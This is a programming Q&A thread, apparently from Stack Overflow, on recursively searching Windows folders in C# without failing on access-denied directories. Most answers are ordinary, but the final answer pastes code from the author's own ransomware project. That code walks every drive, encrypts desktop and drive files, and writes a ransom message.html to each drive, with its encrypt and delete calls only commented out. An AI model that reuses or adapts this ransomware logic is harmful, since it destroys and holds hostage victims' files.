# Searching for all folders in c#, without dieing on one I don't have access too

Tags: c#, file-permissions, directory

I want to search the hard drive for folders with "StudentPortalNightly" in them
but when I get instead is an exception because I don't have access to all the folders..

```
List<string> dirs = Directory.GetDirectories( @"C:\" , "StudentPortalNightly", SearchOption.AllDirectories).ToList();
```

Is there a way to search only the folders I have legitimate access to?

Thanks

Eric-

Comment: See the answer to my question on this, the answer worked perfectly - http://stackoverflow.com/questions/7756626/enumerating-files-throwing-exception

Comment: Why don't you simple catch the exception?

Comment: @Ramhound, presumably because it won't fix the problem. He wants all folders he has access to, not all folders up to the one he doesn't and nothing after it.

Comment: This drove me crazy until I got that answer, whenever you catch the exception it just stops the entire enumeration, it doesn't look like you can catch exceptions and return to enumerate the next file.

Answer (score 0, accepted):

[image: Screenshot from your code example]

```
List<string> dirs = new List<string>(Directory.GetFiles(@"C:\").ToList());
```

Comment: I doubt this will work, as per above. The enumerations on the files will still throw the exception.

Comment: it works I just tested it and it will add a list of all files into a List with full path and file name.. unless he only wants the names then he will have to strip off the path..

Comment: Maybe you have different permissions but I just tried it and got Access to the path 'C:\$Recycle.Bin\S-1-5-21-3836598418-2506196355-976077039-1000\' is denied. Anyways, lets just see if it solves the OP.

Comment: c$ is a share does he have permission to that share.. try it on a local drive plus S-1-5 looks like it's another user account type of folder what ever the case just to get the files the above code will work his initial example will not work.. needs to get rights/permissions changed there must be a reason he doesn't have access

Comment: I'm not sure what permissions he will have, just to point out, c$ isn't where it's searching, its searching in $Recycle.Bin, is that a hidden share? Presumably the recycle bin lol

Comment: Sorry guys I actualy threw this approach out and hardedcoded it all instaded of trying to discover. It's on a very locked down serverand i was tryign to make it agnostic of where it was installed. Thanks for the effort.

Comment: I tried your soloution with the recursive search and it got the exact same error...  List<string> dirs = new List<string>(Directory.GetFiles(@"C:\","StudentPortalNightly.exe",SearchOption.AllDirectories) .ToList());

Comment: I would need to see the exact error.. also are you wanting so search for all file what I searched is different than what you have .. you are passing StudentPortalNightly.ext for some reason.. not sure why .. please clarify

Answer (score 0):

Try-catch will work so long as you catch the correct exception.  In this case you need to catch `System.UnauthorizedAccessException`

Comment: See the comments in the original question, this will not work asit halts execution and i cant resume on the next folder.

Answer (score 0):

Im not sure if this will work for you, but i used this in my Github Project and it worked. for some users it doesnt work because of the file permission error, but it wont break execution and goes on. This cdode is from my [Ransomware Project](https://github.com/hackthedev/teardrop/blob/master/teardrop/teardrop/Form1.cs) i once made. Im sure you need to edit some part of the code below.

```
// So this is where a lot of magic is happening, and you dont wanna touch it unless spending 
        // a lot of time in getting it to work again. Since it "kinda works" (like 80%), im not gonna
        // try to fix this as long as a handful of people request it. It was already a pain and im happy
        // it works for now.
        string[] file;
        private void ShowAllFoldersUnder(string path, int indent, string mode = "decrypt")
        {
            try
            {
                if ((File.GetAttributes(path) & FileAttributes.ReparsePoint)
                    != FileAttributes.ReparsePoint)
                {
                    foreach (string folder in Directory.GetDirectories(path))
                    {
                        if (!folder.Contains("System Volume Information"))
                        {
                            try
                            {
                                file = Directory.GetFiles(Path.GetFullPath(folder));
                            }
                            catch (Exception ex) { write(ex.Message); }

                            // This should check the file extension.
                            foreach (string s in file)
                            {
                                // Do whatever u want

                            }
                        }

                        ShowAllFoldersUnder(folder, indent + 2);
                    }
                }
            }
            catch (Exception e) { write(e.Message); Log(e.Message, "ShowAllFolderUnder > General Error"); }
            
        }

        // This will get all the files  and and tries to encrypt it. It works together with "ShowAllFoldersUnder()"
        // to get as many files as possible.
        public void GetFiles(string mode = "encrypt")
        {
            try
            {
                // Encrypt Desktop Files first!
                string[] desktopFiles = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Desktop), "*.*", SearchOption.AllDirectories);
                foreach(string s in desktopFiles)
                {
                    try
                    {
                        if (!s.Contains(Properties.Settings.Default.extension) && !s.Contains("Sytem Volume Information") && mode != "decrypt")
                        {
                            // FUSE
                            //Task.Run(() => Crypto.FileEncrypt(s, Properties.Settings.Default.key));
                            write("Encrypted " + s);

                            try
                            {
                                // FUSE
                                //File.Delete(s);
                            }
                            catch (Exception ex2)
                            {
                                write("Cant delete file " + ex2.Message);
                                Log(ex2.Message, "GetFiles > File Delete Error");
                            }
                        }
                        else if(mode == "decrypt")
                        {
                            if(s.Contains(Properties.Settings.Default.extension) && !s.Contains("System Volume Information"))
                            {
                                Task.Run(() => Crypto.FileDecrypt(s, s.Replace(Properties.Settings.Default.extension, ""), Properties.Settings.Default.key));
                                write("Decrypted " + s);

                                try
                                {
                                    // Delete original encrypted file?
                                    //File.Delete(s);
                                }
                                catch (Exception ex2)
                                {
                                    write("Cant delete file " + ex2.Message);
                                    Log(ex2.Message, "GetFiles > File Delete Error");
                                }
                            }
                        }
                    }
                    catch (Exception ex)
                    {
                        Log(ex.Message, "Getfiles > General Error");
                    }
                }

                // Now Encrypt whole hard drive
                foreach (var drive in DriveInfo.GetDrives())
                {

                    // This will try to create message in eighter plain text file or html file.
                    try
                    {
                        if(Properties.Settings.Default.message.Length > 0)
                        {
                            File.WriteAllText(drive.Name + "\\message.html", Properties.Settings.Default.message);
                            File.WriteAllText(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\message.html", Properties.Settings.Default.message);

                            write("Created File message.html on drive " + drive.Name + "\\message");
                            Log("File 'message.html' created on drive " + drive.Name + "\\message.html", "GetFiles > Check Message Settings");
                        }
                    }
                    catch (Exception ex)
                    {
                        Log(ex.Message, "GetFiles > Create Message File");
                        write(ex.Message);
                    }


                    try
                    {
                        write("Found drive " + drive.Name);
                        Log("Found drive " + drive.Name, "GetFiles > Drive State Check");

                        try
                        {
                            //  if the drive is ready try to get all the files and files in subfolders using ShowAllFoldersUnder()
                            if (drive.IsReady)
                            {
                                // Get all sub folders etc
                                ShowAllFoldersUnder(drive.Name, 0);
                            }
                            else
                            {
                                Log("Found drive " + drive.Name + " , but it's not ready.", "GetFiles > Drive State Check");
                                write("Found drive " + drive.Name + " , but it's not ready.");
                            }
                        }
                        catch { }
                    }
                    catch (Exception ex1)
                    {
                        write("ex1 " + ex1.Message);
                        Log(ex1.Message, "GetFiles > Drive Error");
                    }
                }
            }
            catch(Exception ex)
            {
                Log(ex.Message, "GetFiles > General Drive Error");
            }

            write("Done getting stuff :)");
        }
```